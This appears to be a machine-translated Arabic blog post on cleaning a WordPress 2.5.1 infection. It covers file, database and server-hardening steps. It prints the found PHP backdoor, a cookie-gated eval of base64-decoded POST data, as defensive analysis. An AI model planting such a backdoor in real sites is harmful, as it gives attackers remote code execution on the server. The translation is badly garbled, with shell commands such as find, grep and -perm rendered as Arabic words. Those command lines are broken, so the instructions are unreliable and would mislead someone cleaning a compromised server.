قبل قراءة هذا المقال، يجب أن تشاهد وظيفة هنا، أن نفهم شيئا. :)
لقد وجدته في عدة ملفات مدونة على stealthsettings.com ، أكواد مشابهة لتلك الموجودة أدناه ، والتي ظهرت نتيجة للفيروس بامتداد إنجاز WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
إذا كان ما سبق هو عن ملف xmlrpc.php من نعسان، وفي البقرى الخادم، يبدو وكأنه الكثير جدا من هذا النوع في رموز المصدر.
تنظيف الملفات المصابة:
Ooookkkk ...
1. الحل الأفضل، كما يتم ذلك دعموتنظيف قاعدة البيانات هو نزع ملفات WordPress (يمكنك الاحتفاظ بملف wp-config.php والملفات التي لا ترتبط ارتباطًا وثيقًا بمنصة wp ، بعد فحصها بعناية) على الخادم وتحميلها إلى الإصدار الأصلي 2.5.1 (وفي هذه المناسبة وجعل إصدار الترقية الفسفور الابيض :)) http://wordpress.org/download/ . مسح الملفات بما في ذلك موضوع إذا كنت لا تثق بهم أن فحص دقيق.
ويبدو أنها قد تأثرت والملفات من المواضيع التي لم يتم استخدامها من قبل على بلوق وببساطة تغيير موضوع، لا يحل المشكلة.
./andreea/wp-content/themes/default/index.php:
2. بحث وحذف جميع الملفات التي تحتوي على:. * _new.php، * _old.php، * Jpgg، * غيف، * Pngg وملف WP-info.txt، إن وجدت.
تجد. -اسم "* _new.php"
تجد. -اسم "* _old.php"
تجد. -name "* .jpgg"
تجد. -اسم "* _giff"
تجد. -اسم "* _pngg"
تجد. -اسم "wp-info.txt"
3. في / تمة وبحث وحذف المجلدات مثل tmpYwbzT2
SQL تنظيف :
1. في الجدول الجدول wp_options التحقق من عدم وحذف الأسطر: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. الكل في wp_options، اذهب إلى active_plugins وحذف إذا كان هناك البرنامج المساعد الذي ينتهي في أحد ملحقات * _new.php، * _old.php، *. jpgg، *. غيف، *. pngg أو إذا اشتبه تمديد آخر، والتحقق بعناية.
3. في الجدول wp_users، انظر إذا كان هناك مستخدم لديه لم يكتب أي شيء في حقه، العمود user_nicename. احذف هذا المستخدم ، لكن تذكر الرقم الموجود في عمود المعرف. من المحتمل أن يستخدم هذا المستخدم "WordPress"كاليفورنيا user_login يتم إنشاء ويظهر على 00: 00: 00 0000-00-00.
4. انتقل إلى الجدول wp_usermeta وحذف جميع الخطوط ينتمون معرف أعلاه.
بعد الانتهاء من تنظيف sql هذا ، قم بتعطيل أي مكون إضافي ثم تنشيطه. (في المدونة -> لوحة التحكم -> المكونات الإضافية)
خادم آمن:
1. ترى ما هي الدلائل والملفات "للكتابة"(chmod 777) وحاول وضع ملف chmod والتي لن تسمح بعد الآن بكتابتهم على أي مستوى. (chmod 644 ، على سبيل المثال)
البحث. -بيرم-2-LS
2. نرى ما لديك ملفات مجموعة بت SUID أو SGID . إذا كنت لا تستخدم وضع تلك الملفات عليها chmod 0 أو إلغاء تثبيت الحزمة التي يتضمنها. أنها خطرة جدا، لأنهم تنفيذ الامتيازات "رأس التجميع"أو"جذر"ليس مع امتيازات المستخدم العادي لتنفيذ هذا الملف.
العثور على / من نوع F-بيرم-04000-LS
العثور على / من نوع F-بيرم-02000-LS
3. تحقق ما هي المنافذ المفتوحة ومحاولة إغلاق أو تأمين تلك التي لا يتم استخدامها.
الأمر netstat-AN | البقرى-I الاستماع
حول هذا الموضوع. أرى وحظرت بعض بلوق de Google Search وآخرون يقولون "أحسنتهم !!!" . حسنًا ، كنت سأفعل ذلك من أجلهم ... لكن ماذا ستقول إذا بدأت Google في الحظر جميع المواقع تشكيل غير المرغوب فيه ووضع حصان طروادة (Trojan.Clicker.HTML) في ملفات تعريف الارتباط؟
تفكير واحد في "WordPress Exploit - تنظيف ملفات الفيروسات وأمن SQL والخادم. "